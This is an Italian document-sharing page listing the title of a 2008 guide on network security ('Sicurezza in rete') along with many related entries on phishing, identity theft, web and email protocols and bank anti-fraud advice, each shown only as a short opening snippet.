SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04 SICUREZZA IN RETE Versione leggera A cura di: M. Ivan Fabris Progetto grafico e struttura: Ing. Michele Mordenti Release : Forlì, 2008 10 04 SOMMARIO Jungla Selvaggia Attacchi illeggittimi e legittimi

Dettagli

1. Il furto di identità digitale

1. Il furto di identità digitale 1. Il furto di identità digitale La diffusione crescente dei servizi disponibili in rete costituisce un fatto di rilevanza assoluta, con il quale un numero sempre maggiore di diverse realtà aziendali è

Dettagli

Reti di Comunicazione e Internet

Reti di Comunicazione e Internet Politecnico di Milano Dipartimento di Elettronica e Informazione Reti di Comunicazione e Internet Laboratorio 6. Wireshark e Protocolli Applicativi Agenda della lezione Wireshark Protocolli applicativi:

Dettagli

Protocolli applicativi basati su TCP/IP

Protocolli applicativi basati su TCP/IP Protocolli applicativi basati su TCP/IP A.A. 2005/2006 Walter Cerroni Protocolli applicativi Sono i protocolli utilizzati dalle applicazioni per scambiarsi informazioni attraverso la rete Esempi: HTTP

Dettagli

Virus e minacce informatiche

Virus e minacce informatiche Virus e minacce informatiche Introduzione L utilizzo quotidiano della rete Internet è ormai molto intenso e spesso irrinunciabile e riguarda milioni di utenti. La sempre maggiore diffusione della posta

Dettagli

Sistemi Di Elaborazione Dell informazione

Sistemi Di Elaborazione Dell informazione Sistemi Di Elaborazione Dell informazione Dott. Antonio Calanducci Lezione IV: Internet e la posta elettronica Corso di Laurea in Scienze della Comunicazione Anno accademico 2009/2010 Outline - Internet

Dettagli

Capitolo 2 - parte 2. Corso Reti ed Applicazioni Mauro Campanella

Capitolo 2 - parte 2. Corso Reti ed Applicazioni Mauro Campanella Capitolo 2 - parte 2 Corso Reti ed Applicazioni Mauro Campanella La nascita del World Wide Web L idea fu nel 1989 di Tim Berners Lee, fisico del CERN di Ginevra. Vi era la necessità di far collaborare

Dettagli

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015)

CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) serie Tecnica n. Codice Attività: TS 3015 CENTRALE DI ALLARME PER ATTACCHI INFORMATICI (Pos. 2603/3015) Scheda di segnalazione sul Phishing Si fa riferimento alla lettera circolare ABI TS/004496 del 12/09/03

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

La gestione e la prevenzione delle frodi esterne

La gestione e la prevenzione delle frodi esterne La gestione e la prevenzione delle frodi esterne Gianluigi Molinari Responsabile Ufficio Prevenzione Frodi Direzione Centrale Organizzazione e Sicurezza Roma 28/29 maggio 2012 Il fenomeno delle frodi è

Dettagli

G Data Whitepaper 12/2009. Acquisti sicuri online: come acquistare nel modo giusto i regali di Natale sul Web. Go safe. Go safer. G Data.

G Data Whitepaper 12/2009. Acquisti sicuri online: come acquistare nel modo giusto i regali di Natale sul Web. Go safe. Go safer. G Data. G Data Whitepaper 12/2009 Acquisti sicuri online: come acquistare nel modo giusto i regali di Natale sul Web. Sabrina Berkenkopf e Ralf Benzmüller G Data Security Labs Whitepaper_12_2009_IT Go safe. Go

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO LA POLIZIA POSTALE E DELLE COMUNICAZIONI La Polizia Postale e delle Comunicazioni si occupa della prevenzione e repressione di tutti i reati commessi per il

Dettagli

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS KASPERSKY FRAUD PREVENTION FOR ENDPOINTS www.kaspersky.com KASPERSKY FRAUD PREVENTION 1. Modi di attacco ai servizi bancari online Il motivo principale alla base del cybercrimine è quello di ottenere denaro

Dettagli

INFORMATICA DISTRIBUITA. lez 6 World Wide Web (cont)

INFORMATICA DISTRIBUITA. lez 6 World Wide Web (cont) INFORMATICA DISTRIBUITA prof. lez 6 World Wide Web (cont) Università degli Studi di Milano Scienze e Tecnologie della Comunicazione Musicale a.a. 2009-2010 Scripting Invece di avere un programma esterno,

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Esercitazioni di Tecnologie e Servizi di Rete: Voice over IP (VoIP)

Esercitazioni di Tecnologie e Servizi di Rete: Voice over IP (VoIP) 1 Esercitazioni di Tecnologie e Servizi di Rete: Voice over IP (VoIP) Esercizio 1 Data la cattura riportata in figura relativa alla fase di registrazione di un utente SIP, indicare: 1. L indirizzo IP del

Dettagli

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web 1 Ruberia mobile Android è il sistema operativo per smartphone e tablet più popolare ed è il secondo più preferito dopo Windows dal punto di vista degli autori dei virus. I primi programmi malevoli per

Dettagli

SICUREZZA INFORMATICA MINACCE

SICUREZZA INFORMATICA MINACCE SICUREZZA INFORMATICA MINACCE Come evitare gli attacchi di phishing e Social Engineering Ver.1.0, 19 febbraio 2015 2 Pagina lasciata intenzionalmente bianca 1. CHE COSA È UN ATTACCO DI SOCIAL ENGINEERING?

Dettagli

INFORMATIVA CLIENTELA CartaBcc

INFORMATIVA CLIENTELA CartaBcc INFORMATIVA CLIENTELA CartaBcc L utilizzo di internet quale veicolo per l accesso ad informazioni od esecuzione di operazioni finanziarie presuppone una seppur minimale conoscenza dei rischi connessi all

Dettagli

Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML

Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML Gianluca Moro gianluca.moro@unibo.it Dipartimento di Elettronica, Informatica e Sistemistica G. Moro - Università di Bologna World

Dettagli

Piccolo vocabolario del Modulo 7

Piccolo vocabolario del Modulo 7 Piccolo vocabolario del Modulo 7 Cosa è Internet? Internet è una grossa rete di calcolatori, ossia un insieme di cavi e altri dispositivi che collegano tra loro un numero enorme di elaboratori di vario

Dettagli

Protezione della posta elettronica mediante crittografia

Protezione della posta elettronica mediante crittografia Consorzio per la formazione e la ricerca in Ingegneria dell'informazione Politecnico di Milano Protezione della posta elettronica mediante crittografia Davide Cerri CEFRIEL - Area e-service e Technologies

Dettagli

Sicurezza delle operazioni

Sicurezza delle operazioni Sicurezza delle operazioni GUIDA PRATICA PER LA CLIENTELA www.pattichiari.it 2 Caro Lettore, PattiChiari è il Consorzio di banche nato per semplificare l uso dei prodotti bancari e per migliorare le conoscenze

Dettagli

World Wide Web. Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML. Il Successo del Web. Protocolli di accesso

World Wide Web. Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML. Il Successo del Web. Protocolli di accesso Web e Server-side Computing: Richiami sulla tecnologia Web e FORM HTML Gianluca Moro gmoro@deis.unibo.it Dipartimento di Elettronica, Informatica e Sistemistica Università di Bologna World Wide Web nato

Dettagli

IPBX Office IPBX Office

IPBX Office IPBX Office IPBX Office IPBX Office include, oltre a tutte le funzioni di un centralino tradizionale, funzionalità avanzate quali ad esempio: voice mail con caselle vocali illimitate e personalizzate, risponditore

Dettagli

Un caso concreto di risposta ad un attacco hacker

Un caso concreto di risposta ad un attacco hacker Un caso concreto di risposta ad un attacco hacker http://escher07.altervista.org Premessa Questo documento è ottenuto come generalizzazione di un caso reale. Sono stati oscurati per ovvi motivi indirizzi

Dettagli

E-Commerce & Security

E-Commerce & Security E-Commerce & Security Angelico Massimo 823903 Corso di E-commerce anno accademico 2011 Professore : Marek Maurizio 1 Argomenti trattati Sistemi di pagamento Protocolli per la sicurezza transazioni Principali

Dettagli

Guida alla Prima Configurazione dei Servizi

Guida alla Prima Configurazione dei Servizi Guida alla Prima Configurazione dei Servizi Guida alla Prima Configurazione dei Servizi 1 Indice 1 Configurazione del Centralino-Numero di Servizio...3 1.1 A. Servizio Cortesia e Gestione Code...5 1.2

Dettagli

Organizzazione servizio e-mail

Organizzazione servizio e-mail Francesco Gennai CNR - IAT Reparto elaborazione comunicazione e sicurezza dell informazione Contenuti Modello CMDA (centralized management with delegated administration); Esperienza nell utilizzo del modello

Dettagli

Caratteristiche del protocollo HTTP. Il protocollo HTTP. Messaggi HTTP. Versioni del protocollo

Caratteristiche del protocollo HTTP. Il protocollo HTTP. Messaggi HTTP. Versioni del protocollo Caratteristiche del protocollo HTTP Scambio di messaggi di richiesta e risposta Transazione HTTP o Web Il protocollo HTTP Protocollo stateless Basato sul meccanismo di naming degli URI per identificare

Dettagli

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITAD

GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITAD GLI ILLECITI COMMESSI ATTRAVERSO IL WEB FINALIZZATI AL FURTO D IDENTITAD IDENTITA Torino, 10 dicembre 2013 LA POLIZIA POSTALE E DELLE COMUNICAZIONI 20 COMPARTIMENTI 80 SEZIONI 2000 OPERATORI Contrasto

Dettagli

Sicurezza Informatica e furto di identità nel settore finance: il caso Poste Italiane

Sicurezza Informatica e furto di identità nel settore finance: il caso Poste Italiane Sicurezza Informatica e furto di identità nel settore finance: il caso Poste Italiane Gerardo Costabile Tutela Aziendale Responsabile Sicurezza Logica Daniele Mariani Tutela Aziendale - Sicurezza Logica

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli

Application Layer FTP, SMTP, POP3, IMAP. Ricapitolando. FTP: File Transfer Protocol [RFC 959] porta 80

Application Layer FTP, SMTP, POP3, IMAP. Ricapitolando. FTP: File Transfer Protocol [RFC 959] porta 80 Ricapitolando host or host or Application Layer process controlled by application developer process, SMTP, POP3, IMAP socket TCP with buffers, variables Internet socket TCP with buffers, variables controlled

Dettagli

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati Apriti Sesamo Plus come sistema di Autenticazione Forte AntiPhishing portabilità e protezione dei dati Massimo Penco mpenco@globaltrust.it 1 Sommario -line: il Phishing Una panoramica sulle tecniche più

Dettagli

Benvenuto in Fineco. Guida all attivazione dei servizi

Benvenuto in Fineco. Guida all attivazione dei servizi Benvenuto in Fineco Guida all attivazione dei servizi Entra in FIneco I servizi di Fineco 1 RICEVI I CODICI Codice attivazione Codice utente 2 ATTIVA I CODICI Password web Password telefonica PIN dispositivo

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Application Layer FTP, SMTP, POP3, IMAP

Application Layer FTP, SMTP, POP3, IMAP Application Layer FTP, SMTP, POP3, IMAP Ricapitolando host or host or process controlled by application developer process socket TCP with buffers, variables Internet socket TCP with buffers, variables

Dettagli

Corso LAMP. Linux Apache Mysql Php

Corso LAMP. Linux Apache Mysql Php Corso LAMP Linux Apache Mysql Php Terzo Incontro * Reti basate su TCP/IP * Impostazione della rete su GNU/Linux * Gestione del software su Debian e derivate * Il web Server Apache * Configurazione principale

Dettagli

Le credenziali sono gestite dai server del Centro Elaborazione Dati Amministrativi dell'inaf ed utilizzate dall'idp (Identity Provider) dell'inaf.

Le credenziali sono gestite dai server del Centro Elaborazione Dati Amministrativi dell'inaf ed utilizzate dall'idp (Identity Provider) dell'inaf. Questo breve manualetto vi spiega come prenotare una multi conferenza utilizzando la MCU del GARR. Per accedere al servizio di prenotazione e' indispensabile possedere credenziali di accesso, il personale

Dettagli

- Corso di computer -

- Corso di computer - - Corso di computer - @ Cantiere Sociale K100-Fuegos Laboratorio organizzato da T-hoster.com www.t-hoster.com info@t-hoster.com La posta elettronica La Posta Elettronica è un servizio internet grazie al

Dettagli